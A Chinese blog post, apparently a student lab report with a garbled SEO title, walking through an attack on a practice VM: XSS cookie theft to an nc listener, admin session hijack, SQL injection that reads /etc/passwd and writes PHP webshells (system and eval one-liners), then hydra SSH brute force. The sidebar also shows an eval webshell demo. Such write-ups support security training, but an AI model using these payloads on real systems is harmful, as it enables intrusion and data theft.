php %3cpre%3c pre%3e,实验报告五 web 攻击靶机解题过程(未完成)

最新推荐文章于 2021-03-24 21:34:45 发布
最新推荐文章于 2021-03-24 21:34:45 发布
阅读量251 收藏
点赞数
文章标签: php %3cpre%3c pre%3e

sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

在192.168.179.129机器上打开网页:

20181024102351340274.png

是个博客系统。

每个博客标题下面可以评价:

20181024102352047260.png

测试下是否存在xss漏洞。

发现提交后有弹出框:

20181024102352208382.png

进一步构造内容

同时在192.168.179.142机器上用nc打开80端口。

20181024102352297244.png

在原来机器上登陆admin账户,密码是p4ssw0rd

20181024102352434930.png

登陆进去后查看刚才发布的评论话题。

接着在142这台机器查看nc的返回内容。

20181024102352551134.png

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

20181024102352702491.png

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

20181024102352880214.png

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

发现2和3可以显示出来。

20181024102352982747.png

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

20181024102353104809.png

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

20181024102353241519.png

在查看源码时发现有css目录

20181024102353429984.png

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

20181024102353542281.png

说明s.php文件成功写入到/var/www/css 目录,下面将

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

20181024102353722934.png

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

20181024102353821560.png

之前发现机器开了ssh,因此用hydra爆破下:

20181024102353934834.png

ssh登陆

20181024102354114510.png

再也不怂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xsslabs靶机解题_实验报告web 攻击靶机解题过程
weixin_39575937的博客
12-19 159
1.sql注入先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.138.134的可疑ip地址打开该虚拟机提供的网页 使用发现可能存在sql注入点http://192.168.138.134/cat.php?id=1http://192.168.138.134/cat.php?id=1'使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉...
I-fuzzy拓扑空间中的pre-连续和cpre-连续 (2014年)
06-18
在I-fuzzy拓扑空间框架下引入了I-fuzzy pre-(resp。... cpre-)重域及I-fuzzy pre-内部等概念,进而在I-fuzzy拓扑空间中讨论了I-fuzzy pre-连续和cpre-连续,证明了I-fuzzy中pre-连续的分解定理。
渗透测试实战4——Node靶机入侵
浅浅的博客
04-25 1311
一、实验环境 攻击机(Kali):192.168.247.149 靶机(Node):192.168.247.152 二、实验步骤 一)主动信息收集 1、主机发现 2、端口扫描 3、端口版本信息 扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。 二)端口探测 端口3000(http服务) 1、探测目录 因为htt...
渗透测试实战8——SickOS靶机入侵
浅浅的博客
05-10 3113
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——22端口 端口探测——80端口 1、目录探测 2、获取shell 3、提权 4、防火墙规则 一、实验环境 攻击机(Kali):192.168.247.181 靶机(SickOS):192.168.247.180 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22...
php %3cpre%3c pre%3e,PHP代码执行与命令注入
weixin_35659266的博客
03-11 369
1. php 代码执行eval# 1. 没有任何过滤@eval($_GET["cmd"]);?>visit: ?cmd=phpinfo();?cmd=fputs(fopen('test.php','w'),'')# 2. addslashes 过滤$cmd = @(string)$_GET["cmd"];eval('$cmd="' . addslashes($cmd) . '";');?&g...
php %3cpre%3c pre%3e,PHP基础知识小结1
weixin_39818727的博客
03-11 444
1.变量与常量的区别与创建,访问方式变量与常量的区别变量是临时存储数据的容器,是实现数据服用的手段。变量分为全局变量,私有变量,和超全局变量,除超全局变量外,其他变量受作用域限制。变量必须以$作为开始,变量名区分大小写常量创建必须给定一个值,一旦被定义就无法再更改,通常用大写表示。常量不受作用域限制变量与常量的创建变量名必须以$作为开始,不允许使用特殊字符,数字作为变量的开始,必须使用字母或下划线...
php%3cpre%3e有什么用,关于php:尝试上传到Cloudinary时收到令人困惑的错误
weixin_42347739的博客
03-10 344
我一直在努力使cloudinary上传工作。使用php cloudinary库中的示例,它可以独立运行,并且可以顺利上传。当我将代码移至现有的Laravel应用程序时,我遇到了问题。即我在控制台中收到此错误:XMLHttpRequest cannot load https://api.cloudinary.com/v1_1/mycloudinaryname/auto/upload. The req...
php%3cpre%3e有什么用,phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_34168834的博客
03-10 604
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit#!/bin/bash# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11# by pagvac (gnucitizen.org), 4th June 2009.# spec...
php%3cpre%3e有什么用,Phpwind登录Cookie分析(2)
weixin_39866874的博客
03-24 170
/*** Encoding : UTF-8* Created on : 2011-8-2 23:23:58 by 李生平 ,QQ:115959903,Email:fsrm365#qq.com Blog:http://www.lishengping.com*//*** 对数据库的一些配置*/$CFG = array('db_name' => 'phpwind','db_host' => ...
php%3cpre%3e有什么用,[PHP]phpMyAdmin发现代码注射漏洞!
weixin_29370077的博客
03-10 366
#!/bin/bash# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11# by pagvac (gnucitizen.org), 4th June 2009.# special thanks to Greg Ose (labs.neohapsis.com) for discoverin...
cpre550:CPRE 550的类项目
05-19
【标题】"cpre550:CPRE 550的类项目"指的是一个针对CPRE 550课程的编程项目,可能是学生或教师为教学目的而创建的。CPRE 550可能是一门关于软件工程、计算机编程或者相关领域的高级课程,旨在深入探讨和实践某个特定...
IREB-CPRE Fl exam 模拟试题 国际专业需求工程师 基础级课程
01-03
【IREB CPRE FL模拟试题】是为准备国际专业需求工程师基础级认证考试的考生们设计的一套完整的复习材料。这个认证旨在验证候选人在需求工程领域中的基础知识和技能。以下是对该模拟试题集的详细解析: 一、考试概述...
CPRE288IROBOT
02-15
标题 "CPRE288IROBOT" 暗示我们可能在讨论一款与机器人相关的软件或项目,可能是机器人操作系统(Robot Operating System, ROS)的一部分,或者是某个特定的机器人工程实践。"CPRE" 可能是课程代码或者项目代号,而 ...
使用 React 和 Redux 进行井字游戏并附带源代码.zip
最新发布
07-24
项目:使用 React 和 Redux 进行井字游戏并附带源代码 使用 react 和 redux 的井字游戏是一个简单的 react 项目。整个项目都是使用 react components 和redux制作的。游戏很简单,玩法也很多。要运行此项目,您必须先安装 NodeJS。 关于项目 井字游戏反应而 redux 是使用ReactJS开发的。说到这个游戏,它具有高级功能和游戏玩法。要运行此项目,首先,您必须安装费用到您的系统。然后运行npm安装然后开始运行npm开始。游戏启动后,您可以选择不同的游戏选项。您还可以选择所需的网格框数量。此外,您还可以选择对手的类型。 要运行此项目,您需要 在计算机上安装NodeJS 并使用现代浏览器,例如 Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
使用 JavaScript 编写的专注力游戏(附源代码).zip
07-24
项目:JavaScript 中的专注力游戏(附源代码) 专注力游戏是一个使用 JavaScript、CSS 和 HTML 开发的简单项目。这款游戏很有趣。玩家必须点击移动的框并获得分数。要点击正确的位置,玩家需要在这个游戏中集中注意力。这款游戏可以帮助玩家练习以进一步增强他们的专注力。 游戏制作 这个游戏项目仅使用 HTML、CSS 和 JavaScript。说到这个游戏的特点,用户必须单击移动框并得分。游戏有三种模式:简单、中等和困难。游戏的 PC 控制非常简单。您只需使用光标单击移动框的碎片即可。 该游戏包含大量的 javascript 以确保游戏正常运行。 如何运行该项目? 要运行此游戏,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox。要玩游戏,首先,单击 index.html 文件在浏览器中打开游戏。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
人脸识别方案资料61EDA-C1590.zip
07-24
人脸识别方案资料61EDA_C1590.zip
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明)
07-24
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明) 该设计为DK124控制的开关电源,实现12V 2A输出; 功能: 1、使用DK124核心控制; 2、反激式开关电源拓扑设计; 3、实现12V 2A输出; 4、市电输入; 5、整流、滤波、变压器等电路; 6、原理图、PCB图、BOM表、设计说明;
IREB需求工程基础级别模拟考试及CPRE认证介绍
- IREB的基础级别考试包含72分的题目,要求在75分钟内闭卷完成,通过标准是得分达到总分的70%或以上。 - 使用提供的模拟考试改卷校对助理可以评估个人表现,判断是否达到通过标准。 这份模拟试题集是准备IREB ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值